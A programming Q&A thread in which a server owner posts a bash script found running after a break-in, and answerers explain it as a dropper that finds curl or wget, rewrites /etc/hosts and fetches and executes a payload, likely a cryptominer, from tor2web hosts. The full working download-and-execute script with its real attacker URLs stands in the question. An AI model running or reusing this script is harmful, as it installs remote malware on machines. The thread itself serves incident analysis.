# My server has been broken into. What does this suite of shell lines mean?

Tags: shell

As said, I've just discovered that one of my private servers has been penetrated and the following bash has been executed on it :

```
tbin=$(command -v passwd);
bpath=$(dirname "${tbin}");
curl="curl";
if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];
  then curl="echo";
  if [ "${bpath}" != "" ];
    then for f in ${bpath}*;
      do
        strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE"
        curl="$f"
        break;
        done;
  fi;
fi;

wget="wget";

if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];
  then wget="echo";
  if [ "${bpath}" != "" ];
  then for f in ${bpath}*;
    do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break;
    done;
  fi;
fi;

if [ $(cat /etc/hosts|grep -i "tor2web."|wc -l) -ne 0 ];
  then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;
fi;

rand=$(head /dev/urandom|tr -dc A-Za-z0-9|head -c $(shuf -i 4-16 -n 1);
echo "");

if [ -z ${rand} ];
  then rand=".tmp"
fi;

echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.${rand}";
rm -f "$(pwd)/.${rand}" >/dev/null 2>&1;
echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.${rand}"
rm -f "/tmp/.${rand}" >/dev/null 2>&1;
(${curl} -fsSLk --retry 3 --connect-timeout 17 --max-time 36 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o "${LPATH}"||${curl} -fsSLk --retry 3 --connect-timeout 17 --max-time 36 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm -o "${LPATH}"||${curl} -fsSLk --retry 3 --connect-timeout 17 --max-time 36 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o "${LPATH}"||${wget} --quiet --no-check-certificate --tries=3 --connect-timeout=17 --timeout=36 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O "${LPATH}"||${wget} --quiet --no-check-certificate --tries=3 --connect-timeout=17 --timeout=36 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm -O "${LPATH}"||${wget} --quiet --no-check-certificate --tries=3 --connect-timeout=17 --timeout=36 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O "${LPATH}") && chmod +x "${LPATH}" && sh "${LPATH}"
```

I'm not sure exactly what it does, hence I'm not sure what to do now, apart from resetting the server altogether. Also I'm curious as to the objective of it.
Thank you !

Comment: It downloads another shell script from tor network and runs it

Comment: Here's a paste of the script from the last line: https://pastebin.com/GUeNGzu7

Comment: "Please explain this code to me" questions are considered by nature too broad to be welcome on this site. See https://meta.stackoverflow.com/questions/253894/how-to-handle-explain-how-this-code-dump-works-questions on [meta].

Comment: @LevLevitsky, ...of course, that's what it does *today*, on one particular download. They could easily have a rotating cast of payloads, handing out n% to each botnet depending on who paid how much; targeting specific geographic areas or companies for specific interest; etc.

Comment: @CharlesDuffy true, which is part of the reason why I decided to copy it.  It could be taken down or changed, reducing the value of the question.

Comment: Sure; I simply don't see this question as one that adds value to the knowledge base *at all*. Even if someone else was broken into by an attacker using the exact same script, what are the chances they're going to be able to search for it effectively? And moreover, do we really want a separate Q&A entry for every possible payload? (Moreover, per the above links, there's a clear and already-decided consensus on meta that we *don't* want explain-this-code questions at all).

Answer (score 1, accepted):

All the action really happens in the last line, which implements the main purpose of this script: to attempt to download some (presumably malicious) payload from a variety of sites (listed in the last line), and if that is successful then executes the payload.

The rest of the script is just support for that, mostly an fairly exhaustive way of finding a suitable [curl](https://curl.haxx.se/) or [wget](https://www.gnu.org/software/wget/) binary in order to perform the download. It also checks if your `/etc/hosts` file contains a line with `tor2web.`, and if it does the hosts file is overwritten with a default one that only has a `127.0.0.1` line for `localhost`. This step will probably fail unless running as root.

Your server is thoroughly compromised and you should discard it (if it is a VM) or reformat it.

Answer (score 2):

The first part is a bit of infrastructure work, to get a gasp of the system layout and installed software. Then it cleans up the hosts file to remove traces of an earlier stage of the attack. Then checks for a possible payload download location. The real thing happens on the last line, it downloads a payload and executes it.

There are two possible candidates:
[CVE 2019-9670](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670)
and
[CVE 2019-10149](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149)
most probably the latter.

The ultimate goal of the attack seems to be to install a cryptominer into the server.